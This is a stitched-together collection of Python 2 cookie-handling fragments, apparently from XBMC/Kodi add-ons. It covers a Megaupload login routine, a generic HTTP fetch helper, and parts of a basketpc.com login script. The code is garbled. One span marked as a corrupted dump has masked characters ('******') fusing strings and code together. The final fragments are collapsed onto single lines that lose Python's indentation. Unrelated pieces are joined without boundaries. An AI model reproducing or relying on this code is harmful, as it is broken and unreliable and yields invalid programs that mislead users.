                ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    #print "-------------------------------------------------------"
    url = "http://www.megaupload.com/?c=login"
    #print url
    #print "-------------------------------------------------------"
    theurl = url
    # an example url that sets a cookie,
    # try different urls here and see the cookie collection you can make !
    # Escape '&' in the password so it survives form-encoding.
    passwordesc = password.replace("&", "%26")
    # ---- BEGIN REDACTED SPAN (kept verbatim from the corrupted dump) ----
    # The original presumably concatenated login/passwordesc into txdata,
    # performed the POST, and read `cookiedata` from the cookie file,
    # inside a debug-output block -- irrecoverable from this copy.
    txdata = "login=1&redir=1&username="******"&password="******"----------------------") xbmc.output("Cookies despues") xbmc.output("----------------------") xbmc.output(cookiedata) xbmc.output("----------------------") '''
    patronvideos = 'user="******"]+)"'
    # ---- END REDACTED SPAN ----
    matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata)
    if len(matches) == 0:
        # Fallback pattern: unquoted cookie value terminated by ';'.
        patronvideos = 'user=([^\;]+);'
        matches = re.compile(patronvideos, re.DOTALL).findall(cookiedata)
    if len(matches) == 0 and DEBUG:
        xbmc.output("No se ha encontrado la cookie de Megaupload")
        xbmc.output("----------------------")
        xbmc.output("Respuesta de Megaupload")
        xbmc.output("----------------------")
        xbmc.output(data)
        xbmc.output("----------------------")
        xbmc.output("----------------------")
        xbmc.output("Cookies despues")
        xbmc.output("----------------------")
        xbmc.output(cookiedata)
        xbmc.output("----------------------")
        devuelve = ""
    else:
        devuelve = matches[0]
    return devuelve
def read_body_and_headers(url, post=None, headers=[], follow_redirects=False, timeout=None):
    """Fetch *url* and return ``(body, headers)``.

    GET when *post* is None, POST otherwise.  Cookies are persisted in
    ``cookies.dat`` under the data path; gzip-encoded responses are
    transparently decompressed.

    :param url: URL to fetch (stringified before use).
    :param post: urlencoded POST body, or None for GET.
    :param headers: list of [name, value] pairs; a Firefox User-Agent is
        appended when empty.  NOTE(review): mutable default argument --
        the appended User-Agent persists across calls sharing the default.
    :param follow_redirects: when False, a NoRedirectHandler is installed.
    :param timeout: socket timeout in seconds, or None for the default.
    :returns: tuple -- (body string, list of [name, value] response headers).
    """
    _log("read_body_and_headers " + url)
    if post is not None:
        _log("read_body_and_headers post=" + post)
    if len(headers) == 0:
        headers.append([
            "User-Agent",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:18.0) Gecko/20100101 Firefox/18.0"
        ])
    # Start cookie lib
    ficherocookies = os.path.join(get_data_path(), 'cookies.dat')
    _log("read_body_and_headers cookies_file=" + ficherocookies)
    cj = None
    ClientCookie = None
    cookielib = None
    # Let's see if cookielib is available
    try:
        _log("read_body_and_headers importing cookielib")
        import cookielib
    except ImportError:
        _log("read_body_and_headers cookielib no disponible")
        # If importing cookielib fails
        # let's try ClientCookie
        try:
            _log("read_body_and_headers importing ClientCookie")
            import ClientCookie
        except ImportError:
            _log("read_body_and_headers ClientCookie not available")
            # ClientCookie isn't available either
            urlopen = urllib2.urlopen
            Request = urllib2.Request
        else:
            _log("read_body_and_headers ClientCookie available")
            # imported ClientCookie
            urlopen = ClientCookie.urlopen
            Request = ClientCookie.Request
            cj = ClientCookie.MozillaCookieJar()
    else:
        _log("read_body_and_headers cookielib available")
        # importing cookielib worked
        urlopen = urllib2.urlopen
        Request = urllib2.Request
        cj = cookielib.MozillaCookieJar()
        # This is a subclass of FileCookieJar
        # that has useful load and save methods
    if cj is not None:
        # we successfully imported
        # one of the two cookie handling modules
        _log("read_body_and_headers Cookies enabled")
        if os.path.isfile(ficherocookies):
            _log("read_body_and_headers Reading cookie file")
            # if we have a cookie file already saved
            # then load the cookies into the Cookie Jar
            try:
                cj.load(ficherocookies)
            except:
                # Corrupt cookie file: drop it and continue with an empty jar.
                _log("read_body_and_headers Wrong cookie file, deleting...")
                os.remove(ficherocookies)
        # Now we need to get our Cookie Jar
        # installed in the opener;
        # for fetching URLs
        if cookielib is not None:
            _log("read_body_and_headers opener using urllib2 (cookielib)")
            # if we use cookielib
            # then we get the HTTPCookieProcessor
            # and install the opener in urllib2
            if not follow_redirects:
                opener = urllib2.build_opener(
                    urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),
                    urllib2.HTTPCookieProcessor(cj),
                    NoRedirectHandler())
            else:
                opener = urllib2.build_opener(
                    urllib2.HTTPHandler(debuglevel=http_debug_log_enabled),
                    urllib2.HTTPCookieProcessor(cj))
            urllib2.install_opener(opener)
        else:
            _log("read_body_and_headers opener using ClientCookie")
            # if we use ClientCookie
            # then we get the HTTPCookieProcessor
            # and install the opener in ClientCookie
            opener = ClientCookie.build_opener(
                ClientCookie.HTTPCookieProcessor(cj))
            ClientCookie.install_opener(opener)
    # -------------------------------------------------
    # Cookies installed, issue the request
    # -------------------------------------------------
    # Timer (NOTE(review): time.clock() is wall-clock only on Windows and
    # removed in Python 3.8)
    inicio = time.clock()
    # Dictionary for the request headers
    txheaders = {}
    # Build the request
    if post is None:
        _log("read_body_and_headers GET request")
    else:
        _log("read_body_and_headers POST request")
    # Add the headers
    _log("read_body_and_headers ---------------------------")
    for header in headers:
        _log("read_body_and_headers header %s=%s" % (str(header[0]), str(header[1])))
        txheaders[header[0]] = header[1]
    _log("read_body_and_headers ---------------------------")
    req = Request(str(url), post, txheaders)
    if timeout is None:
        handle = urlopen(req)
    else:
        # Available from python 2.6 onwards --> handle = urlopen(req, timeout=timeout)
        # For all versions:
        # NOTE(review): if this try fails, `handle` is never bound and the
        # code below raises NameError; the bare except only logs.
        try:
            import socket
            deftimeout = socket.getdefaulttimeout()
            socket.setdefaulttimeout(timeout)
            handle = urlopen(req)
            socket.setdefaulttimeout(deftimeout)
        except:
            import sys
            for line in sys.exc_info():
                _log("%s" % line)
    # Update the cookie store
    cj.save(ficherocookies)
    # Read the data and close; decompress gzip-encoded bodies.
    if handle.info().get('Content-Encoding') == 'gzip':
        buf = StringIO(handle.read())
        f = gzip.GzipFile(fileobj=buf)
        data = f.read()
    else:
        data = handle.read()
    info = handle.info()
    _log("read_body_and_headers Response")
    returnheaders = []
    _log("read_body_and_headers ---------------------------")
    for header in info:
        _log("read_body_and_headers " + header + "=" + info[header])
        returnheaders.append([header, info[header]])
    handle.close()
    _log("read_body_and_headers ---------------------------")
    '''
    # Lanza la petición
    try:
        response = urllib2.urlopen(req)
    # Si falla la repite sustituyendo caracteres especiales
    except:
        req = urllib2.Request(url.replace(" ","%20"))
        # Añade las cabeceras
        for header in headers:
            req.add_header(header[0],header[1])
        response = urllib2.urlopen(req)
    '''
    # Elapsed time
    fin = time.clock()
    _log("read_body_and_headers Downloaded in %d seconds " % (fin - inicio + 1))
    _log("read_body_and_headers body=" + data)
    return data, returnheaders
import urllib import getopt import httplib import urllib2 from time import sleep from HTMLParser import HTMLParser # if we have Python 2.4's cookielib, use it try: import cookielib policy = cookielib.DefaultCookiePolicy(rfc2965 = True) cookiejar = cookielib.CookieJar(policy) opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookiejar)).open except ImportError: import ClientCookie # if this is a new ClientCookie, we need to turn on RFC2965 cookies cookiejar = ClientCookie.CookieJar() try: cookiejar.set_policy(ClientCookie.DefaultCookiePolicy(rfc2965 = True)) # install an opener that uses this policy opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cookiejar)) ClientCookie.install_opener(opener) except AttributeError: # must be an old ClientCookie, which already accepts RFC2965 cookies pass opener = ClientCookie.urlopen PROGRAM = sys.argv[0] try: True, False
def getAuthentication(self, user, password): COOKIEFILE = 'cookies.lwp' # the path and filename to save your cookies in cj = None ClientCookie = None cookielib = None # Let's see if cookielib is available try: import cookielib except ImportError: # If importing cookielib fails # let's try ClientCookie try: import ClientCookie except ImportError: # ClientCookie isn't available either urlopen = urllib2.urlopen Request = urllib2.Request else: # imported ClientCookie urlopen = ClientCookie.urlopen Request = ClientCookie.Request cj = ClientCookie.LWPCookieJar() else: # importing cookielib worked urlopen = urllib2.urlopen Request = urllib2.Request cj = cookielib.LWPCookieJar() # This is a subclass of FileCookieJar # that has useful load and save methods if cj is not None: # we successfully imported # one of the two cookie handling modules if os.path.isfile(COOKIEFILE): # if we have a cookie file already saved # then load the cookies into the Cookie Jar cj.load(COOKIEFILE) # Now we need to get our Cookie Jar # installed in the opener; # for fetching URLs if cookielib is not None: # if we use cookielib # then we get the HTTPCookieProcessor # and install the opener in urllib2 opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) urllib2.install_opener(opener) else: # if we use ClientCookie # then we get the HTTPCookieProcessor # and install the opener in ClientCookie opener = ClientCookie.build_opener( ClientCookie.HTTPCookieProcessor(cj)) ClientCookie.install_opener(opener) values = {'campo_login': user, 'campo_password': password} #We set the user and the pass theurl = 'http://www.basketpc.com/index.php?mod=autentificacion' # an example url that sets a cookie, # try different urls here and see the cookie collection you can make ! 
txdata = urllib.urlencode(values) # if we were making a POST type request, # we could encode a dictionary of values here, # using urllib.urlencode(somedict) txheaders = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} # fake a user agent, some websites (like google) don't like automated exploration try: req = Request(theurl, txdata, txheaders) # create a request object handle = urlopen(req) # and open it to return a handle on the url except IOError, e: print 'We failed to open "%s".' % theurl if hasattr(e, 'code'): print 'We failed with error code - %s.' % e.code elif hasattr(e, 'reason'): print "The error object has the following 'reason' attribute :" print e.reason print "This usually means the server doesn't exist,'," print "is down, or we don't have an internet connection." sys.exit()